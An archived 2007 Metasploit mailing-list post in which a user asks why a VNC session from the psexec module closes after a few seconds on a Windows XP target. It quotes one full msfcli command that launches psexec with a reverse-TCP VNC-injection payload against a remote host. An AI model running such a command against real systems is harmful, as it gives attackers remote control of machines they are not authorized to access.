Metasploit mailing list archives

smb_relay and vncinject


From: sigtrap at sigtrap.org (sigtrap)
Date: Mon, 10 Sep 2007 15:45:10 +0200

Hi,
On Gentoo I'm running msf v3.1-dev:
./msfcli windows/smb/psexec DisableCourtesyShell=1 LHOST=169.254.133.7
RHOST=127.0.0.1 PAYLOAD=windows/vncinject/reverse_tcp E

Everything works nice and the vncviewer (I have tried tightvnc and
"normal" vnc) pops up. But after 10-30 seconds the vncviewer closes and
msf tells me:
[*] VNC connection closed.

On the Victim (Windows XP Pro) the system event viewer reports Event ID 7009:
(Service Control Manager) Timeout (30000 ms) waiting for the [Random]
service to connect.

I dont know if the Windows error should be regarded becouse the vncviewer
runs perfectly for a couple of seconds...

Any idees?

//Sigtrap 





Current thread: